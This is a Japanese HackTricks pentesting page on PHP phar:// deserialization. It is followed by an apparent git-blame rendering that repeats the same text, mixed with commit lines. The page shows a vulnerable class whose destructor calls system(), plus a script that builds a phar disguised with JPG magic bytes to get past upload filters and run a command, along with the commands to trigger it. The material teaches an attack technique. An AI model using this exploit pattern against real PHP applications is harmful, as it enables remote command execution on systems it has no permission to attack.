hacktricks/pentesting-web/file-inclusion/phar-deserialization.md

# phar:// デシリアライゼーション

<details>

<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>！</strong></summary>

HackTricks をサポートする他の方法:

* **HackTricks で企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**公式PEASS＆HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**してください。
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリに提出してください。

</details>

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**バグバウンティのヒント**: **Intigriti**に**サインアップ**してください。これは、ハッカーによって作成されたプレミアム**バグバウンティプラットフォーム**です！今すぐ[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得し始めましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

**Phar** ファイル（PHPアーカイブ）ファイルには、**シリアル化された形式のメタデータ**が含まれているため、これを解析すると、この**メタデータ**が**デシリアライズ**され、**PHP**コード内の**デシリアライゼーション**脆弱性を悪用しようとすることができます。

この特性の最も良い点は、**`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、`filesize()`**など、PHPコードを評価しないPHP関数を使用していても、このデシリアライゼーションが発生することです。

したがって、**`phar://`** プロトコルを使用して、PHPウェブが任意のファイルのサイズを取得する状況を想像してみてください。そしてコード内で以下のような**クラス**を見つけた場合を考えてみてください：

{% code title="vunl.php" %}
```php
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

filesize("phar://test.phar"); #The attacker can control this path
```
{% endcode %}

**phar**ファイルを作成して、次のようにして**このクラスを悪用して任意のコマンドを実行**することができます：

{% code title="create_phar.php" %}
```php
<?php

class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}

function __destruct() {
system($this->data);
}
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
```
{% endcode %}

**JPGのマジックバイト**（`\xff\xd8\xff`）がpharファイルの先頭に追加され、**可能性のある**ファイル**アップロード****制限**を**バイパス**することに注意してください。\
次のコマンドで`test.phar`ファイルを**コンパイル**します：
```bash
php --define phar.readonly=0 create_phar.php
```
そして、脆弱なコードを悪用して`whoami`コマンドを実行します：
```bash
php vuln.php
```
### 参考文献

{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**バグバウンティのヒント**: **Intigriti** に **サインアップ** してください。これは、ハッカーによって作成されたプレミアムな **バグバウンティプラットフォーム** です！[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) で今すぐ参加し、最大 **$100,000** のバウンティを獲得しましょう！

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>**htARTE (HackTricks AWS Red Team Expert)** で **ゼロからヒーローまでのAWSハッキングを学びましょう**！</strong></summary>

HackTricks をサポートする他の方法:

* **HackTricks で企業を宣伝したい**、または **HackTricks をPDFでダウンロードしたい** 場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください！
* [**公式PEASS＆HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) をフォローする
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する

</details>
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								# phar:// デシリアライゼーション
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								HackTricks をサポートする他の方法:
-												Translated ['pentesting-web/deserialization/nodejs-proto-prototype-pollu

											
										
										
											2024-01-01 19:09:41 +00:00
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								* **HackTricks で企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								* [**公式PEASS＆HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
 								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
 								* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**してください。
 								* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリに提出してください。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								**バグバウンティのヒント**: **Intigriti**に**サインアップ**してください。これは、ハッカーによって作成されたプレミアム**バグバウンティプラットフォーム**です！今すぐ[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得し始めましょう！
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								**Phar** ファイル（PHPアーカイブ）ファイルには、**シリアル化された形式のメタデータ**が含まれているため、これを解析すると、この**メタデータ**が**デシリアライズ**され、**PHP**コード内の**デシリアライゼーション**脆弱性を悪用しようとすることができます。
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								この特性の最も良い点は、**`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、`filesize()`**など、PHPコードを評価しないPHP関数を使用していても、このデシリアライゼーションが発生することです。
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								したがって、**`phar://`** プロトコルを使用して、PHPウェブが任意のファイルのサイズを取得する状況を想像してみてください。そしてコード内で以下のような**クラス**を見つけた場合を考えてみてください：
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
 								{% code title="vunl.php" %}
 								```php
 								<?php
 								class AnyClass {
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								public $data = null;
 								public function __construct($data) {
 								$this->data = $data;
 								}
 								function __destruct() {
 								system($this->data);
 								}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
+								}
 								filesize("phar://test.phar"); #The attacker can control this path
 								```
 								{% endcode %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								**phar**ファイルを作成して、次のようにして**このクラスを悪用して任意のコマンドを実行**することができます：
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% code title="create_phar.php" %}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
+								```php
 								<?php
 								class AnyClass {
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								public $data = null;
 								public function __construct($data) {
 								$this->data = $data;
 								}
 								function __destruct() {
 								system($this->data);
 								}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
+								}
 								// create new Phar
 								$phar = new Phar('test.phar');
 								$phar->startBuffering();
 								$phar->addFromString('test.txt', 'text');
 								$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
 								// add object of any class as meta data
 								$object = new AnyClass('whoami');
 								$phar->setMetadata($object);
 								$phar->stopBuffering();
 								```
 								{% endcode %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								**JPGのマジックバイト**（`\xff\xd8\xff`）がpharファイルの先頭に追加され、**可能性のある**ファイル**アップロード****制限**を**バイパス**することに注意してください。\
 								次のコマンドで`test.phar`ファイルを**コンパイル**します：
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
+								```bash
 								php --define phar.readonly=0 create_phar.php
 								```
-												Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md',

											
										
										
											2024-02-09 08:23:12 +00:00
+								そして、脆弱なコードを悪用して`whoami`コマンドを実行します：
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
+								```bash
 								php vuln.php
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								### 参考文献
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
 								{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-03-19 23:08:07 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								**バグバウンティのヒント**: **Intigriti** に **サインアップ** してください。これは、ハッカーによって作成されたプレミアムな **バグバウンティプラットフォーム** です！[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) で今すぐ参加し、最大 **$100,000** のバウンティを獲得しましょう！
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								<summary><strong>**htARTE (HackTricks AWS Red Team Expert)** で **ゼロからヒーローまでのAWSハッキングを学びましょう**！</strong></summary>
-												Translated ['pentesting-web/deserialization/nodejs-proto-prototype-pollu

											
										
										
											2024-01-01 19:09:41 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								HackTricks をサポートする他の方法:
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:52:15 +00:00
+								* **HackTricks で企業を宣伝したい**、または **HackTricks をPDFでダウンロードしたい** 場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください！
 								* [**公式PEASS＆HackTricksのグッズ**](https://peass.creator-spring.com)を入手する
 								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
 								* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) をフォローする
 								* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>